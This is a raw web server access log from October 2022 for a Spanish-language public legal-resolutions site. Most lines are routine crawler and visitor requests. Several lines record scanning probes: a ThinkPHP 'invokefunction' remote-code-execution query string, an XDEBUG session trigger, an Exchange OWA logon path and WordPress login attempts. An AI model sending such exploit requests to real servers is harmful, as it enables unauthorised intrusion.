157.55.39.202 - - [02/Oct/2022:15:36:04 -0500] "GET /BLA/resoluciones/AUTOS%202014/6000.pdf HTTP/1.1" 200 461216
172.22.2.4 - - [02/Oct/2022:15:34:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63207
69.171.231.118 - - [02/Oct/2022:15:36:57 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
216.245.221.92 - - [02/Oct/2022:15:37:57 -0500] "HEAD / HTTP/1.1" 200 -
173.252.95.15 - - [02/Oct/2022:15:38:13 -0500] "GET /en-semana-santa-no-uses-palmas-ni-traigas-o-consumas-animales-silvestres.html HTTP/1.1" 206 959
172.22.2.4 - - [02/Oct/2022:15:38:38 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [02/Oct/2022:15:38:48 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
201.245.192.253 - - [02/Oct/2022:15:39:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
199.59.150.181 - - [02/Oct/2022:15:39:35 -0500] "GET /images/feria-veh%C3%ADculos-sostenibles_optimized.jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [02/Oct/2022:15:37:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:15:38:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
157.55.39.202 - - [02/Oct/2022:15:40:56 -0500] "GET /BLA/resoluciones/AUTOS%202022/2144.pdf HTTP/1.1" 200 3686885
172.105.161.246 - - [02/Oct/2022:15:41:36 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [02/Oct/2022:15:41:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44690
201.245.192.253 - - [02/Oct/2022:15:41:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44512
207.46.13.89 - - [02/Oct/2022:15:42:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0755.pdf HTTP/1.1" 200 481690
216.245.221.92 - - [02/Oct/2022:15:42:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:15:44:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
157.55.39.202 - - [02/Oct/2022:15:45:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/00001065.tif HTTP/1.1" 200 137460
172.22.2.4 - - [02/Oct/2022:15:43:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:15:44:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
207.46.13.84 - - [02/Oct/2022:15:46:29 -0500] "GET /bla/resoluciones/index.php?dir=resoluciones+2005/res+2005+2651-2700 HTTP/1.1" 200 12369
216.245.221.92 - - [02/Oct/2022:15:47:57 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.202 - - [02/Oct/2022:15:48:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0958.pdf HTTP/1.1" 200 3844161
201.245.192.253 - - [02/Oct/2022:15:49:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:15:48:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58955
23.100.232.233 - - [02/Oct/2022:15:50:13 -0500] "GET /bla/resoluciones/resoluciones%202021/3713.pdf HTTP/1.1" 200 398626
172.22.2.4 - - [02/Oct/2022:15:49:26 -0500] "GET /BLA/boletinlegal/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 36811
5.255.253.106 - - [02/Oct/2022:15:51:06 -0500] "-" 408 -
5.255.253.174 - - [02/Oct/2022:15:51:12 -0500] "-" 408 -
5.45.207.133 - - [02/Oct/2022:15:51:17 -0500] "-" 408 -
172.22.2.4 - - [02/Oct/2022:15:49:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
87.250.224.175 - - [02/Oct/2022:15:51:23 -0500] "-" 408 -
87.250.224.4 - - [02/Oct/2022:15:51:38 -0500] "-" 408 -
213.180.203.85 - - [02/Oct/2022:15:51:53 -0500] "-" 408 -
172.22.2.4 - - [02/Oct/2022:15:50:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
87.250.224.37 - - [02/Oct/2022:15:52:23 -0500] "-" 408 -
185.119.81.102 - - [02/Oct/2022:15:52:41 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [02/Oct/2022:15:52:42 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [02/Oct/2022:15:52:57 -0500] "HEAD / HTTP/1.1" 200 -
5.255.253.166 - - [02/Oct/2022:15:53:23 -0500] "-" 408 -
172.22.2.4 - - [02/Oct/2022:15:52:45 -0500] "GET /BLA/boletinlegal/?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 32715
201.245.192.253 - - [02/Oct/2022:15:54:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
66.249.64.13 - - [02/Oct/2022:15:54:18 -0500] "-" 408 -
213.180.203.3 - - [02/Oct/2022:15:54:23 -0500] "-" 408 -
157.55.39.202 - - [02/Oct/2022:15:56:57 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 269023
172.22.2.4 - - [02/Oct/2022:15:55:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.86.33.183 - - [02/Oct/2022:15:57:27 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 200 443199
186.86.33.183 - - [02/Oct/2022:15:57:27 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 49983
216.245.221.92 - - [02/Oct/2022:15:57:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:15:56:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58575
201.245.192.253 - - [02/Oct/2022:15:59:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
207.46.13.40 - - [02/Oct/2022:16:02:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20851-900/00000891.tif HTTP/1.1" 200 187764
216.245.221.92 - - [02/Oct/2022:16:02:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:16:01:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:16:02:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
201.245.192.253 - - [02/Oct/2022:16:04:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
207.46.13.190 - - [02/Oct/2022:16:07:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0388.pdf HTTP/1.1" 200 331316
216.245.221.92 - - [02/Oct/2022:16:07:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:16:07:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51993
172.22.2.4 - - [02/Oct/2022:16:07:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:16:08:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:16:08:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
207.46.13.84 - - [02/Oct/2022:16:11:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20851-900/00000858.tif HTTP/1.1" 200 82280
216.245.221.92 - - [02/Oct/2022:16:12:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:16:13:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:16:14:02 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%201%20del%2008%20de%20Mayo%20de%202014.pdf HTTP/1.1" 200 180124
172.22.2.4 - - [02/Oct/2022:16:14:18 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 1018
172.22.2.4 - - [02/Oct/2022:16:12:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:16:13:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
216.245.221.92 - - [02/Oct/2022:16:17:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:16:18:31 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [02/Oct/2022:16:18:31 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-046-99.docx HTTP/1.1" 304 -
201.245.192.253 - - [02/Oct/2022:16:18:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
157.55.39.202 - - [02/Oct/2022:16:19:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/4501.pdf HTTP/1.1" 304 -
172.22.2.4 - - [02/Oct/2022:16:18:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
100.26.127.17 - - [02/Oct/2022:16:20:56 -0500] "-" 408 -
172.22.2.4 - - [02/Oct/2022:16:19:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
201.245.192.253 - - [02/Oct/2022:16:21:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44525
201.245.192.253 - - [02/Oct/2022:16:21:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42728
216.245.221.92 - - [02/Oct/2022:16:22:56 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:16:23:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
